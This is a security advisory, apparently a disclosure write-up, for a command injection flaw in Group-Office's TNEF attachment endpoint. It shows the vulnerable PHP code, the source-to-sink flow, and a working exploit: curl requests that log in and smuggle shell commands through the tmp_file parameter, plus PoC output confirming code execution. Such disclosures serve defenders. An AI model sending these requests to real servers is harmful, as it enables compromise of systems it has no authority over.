# CVE-2026-25512: Remote Code Execution via Command Injection in TNEF Handler - Group-Office

<p align="center">
  <img src="https://img.shields.io/badge/CVE-2026--25512-red?style=for-the-badge" alt="CVE-2026-25512">
  <img src="https://img.shields.io/badge/Severity-Critical-darkred?style=for-the-badge" alt="Critical">
  <img src="https://img.shields.io/badge/CVSS_4.0-9.4-critical?style=for-the-badge" alt="CVSS 9.4">
</p>

<p align="center">
  <img src="https://img.shields.io/badge/CWE--78-OS_Command_Injection-orange?style=flat-square" alt="CWE-78">
</p>

> **CVSS 4.0 Vector** : `CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H`

## Table of Contents

- [Summary](#summary)
- [Affected Versions](#affected-versions)
- [Technical Details](#technical-details)
  - [Root Cause](#root-cause)
  - [Source to Sink Flow](#source-to-sink-flow)
- [Exploitation](#exploitation)
  - [Automated Exploit](#automated-exploit)
  - [Manual Exploit](#manual-exploit)
- [Impact](#impact)
- [Timeline](#timeline)
- [Credits](#credits)
- [References](#references)

---

## Summary

A **Critical Remote Code Execution (RCE)** vulnerability was identified in Group-Office. The endpoint `email/message/tnefAttachmentFromTempFile` directly concatenates the user-controlled parameter `tmp_file` into an `exec()` call. By injecting shell metacharacters into `tmp_file`, an authenticated attacker can execute arbitrary system commands on the server.

---

## Affected Versions

| Product      | Affected Versions |
| ------------ | ----------------- |
| Group-Office | ≤ 26.0.4          |

---

## Technical Details

### Root Cause

The `tmp_file` parameter is taken from the HTTP request and used to build a shell command **without escaping or validation**. This results in **command injection** into the `tnef` extraction command, which runs under the web server's privileges.

**Vulnerable Code (`www/modules/email/controller/MessageController.php`):**

```php
protected function actionTnefAttachmentFromTempFile(array $params)
{
    $tmpFolder = \GO\Base\Fs\Folder::tempFolder(uniqid(time()));
    $tmpFile = new \GO\Base\Fs\File(GO::config()->tmpdir.$params['tmp_file']);

    chdir($tmpFolder->path());
    exec(GO::config()->cmd_tnef.' -C '.$tmpFolder->path().' '.$tmpFile->path(), $output, $retVar);
    if($retVar!=0)
        throw new \Exception("TNEF extraction failed: ".implode("\n", $output));

    exec(GO::config()->cmd_zip.' -r "winmail.zip" *', $output, $retVar);
    if($retVar!=0)
        throw new \Exception("ZIP compression failed: ".implode("\n", $output));

    $zipFile = $tmpFolder->child('winmail.zip');
    \GO\Base\Util\Http::outputDownloadHeaders($zipFile,false,true);
    $zipFile->output();

    $tmpFolder->delete();
}
```

### Source to Sink Flow

| Stage           | Description                                                                                       |
| --------------- | ------------------------------------------------------------------------------------------------- |
| **Source**      | `tmp_file` query parameter in `index.php?r=email/message/tnefAttachmentFromTempFile&tmp_file=...` |
| **Propagation** | `new \GO\Base\Fs\File(GO::config()->tmpdir.$params['tmp_file'])`                                  |
| **Sink**        | `exec(GO::config()->cmd_tnef.' -C '.$tmpFolder->path().' '.$tmpFile->path(), ...)`                |

Because `tmp_file` is concatenated into the shell command, metacharacters such as `;`, `&`, backticks, or `$()` allow an attacker to append arbitrary commands.

> **Authentication Requirement:** Yes. `MessageController` enforces a `security_token` CSRF check, so a valid session + token are required.

---

## Exploitation

### Automated Exploit

The PoC script logs in, retrieves the `security_token`, injects a payload through `tmp_file`, and verifies execution by reading `rce.txt` from the ZIP response.

```bash
python3 poc.py
```

**Example Output:**

```
➜  ~ python3 poc.py
[*] Target: http://xx.xx.xxx.xxx:9090
[*] Login status: 200
[*] Login ok, security_token received
[*] Exploit URL: http://xx.xx.xxx.xxx:9090/index.php?r=email/message/tnefAttachmentFromTempFile
[*] tmp_file payload: dummy.dat;id > /tmp/id;id > rce.txt;echo RCE_POC_451a735c >> rce.txt;#
[*] Response status: 200
[+] RCE Confirmed
[+] Command output (id):
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

### Manual Exploit

**Step 1: Login**

```bash
curl -c cookies.txt -b cookies.txt "http://TARGET:PORT/index.php" \
    --data-urlencode "r=core/auth/login" \
    --data-urlencode "username=YOUR_USERNAME" \
    --data-urlencode "password=YOUR_PASSWORD" \
    -H "X-Requested-With: XMLHttpRequest"
```

**Response:**

```json
{
  "success": true,
  "groupoffice_version": "26.0.4",
  "user_id": 2,
  "security_token": "XXXXXXX",
  "sid": "XXXXXXXXXXX"
}
```

**Step 2: Trigger RCE**

```bash
curl -G "http://TARGET:PORT/index.php" \
    -b cookies.txt \
    --data-urlencode "r=email/message/tnefAttachmentFromTempFile" \
    --data-urlencode "security_token=YOUR_TOKEN" \
    --data-urlencode "tmp_file=dummy.dat;id > rce.txt || true;#" \
    -o command_output.zip
```

**Result:**

```bash
➜  unzip command_output.zip
Archive:  command_output.zip
  inflating: rce.txt

➜  cat rce.txt
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

---

## Impact

| Category            | Severity | Description                                                 |
| ------------------- | -------- | ----------------------------------------------------------- |
| **Confidentiality** | High     | Arbitrary command execution allows reading sensitive files. |
| **Integrity**       | High     | Attacker can modify or delete server files.                 |
| **Availability**    | High     | Attacker can disrupt services or delete critical data.      |

---

## Credits

- **Discovered by:** [Oreo](https://numberoreo.fr/) 

---

## References

- [Group-Office Official Website](https://www.group-office.com/)
- [MITRE CVE-2026-25512](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25512)
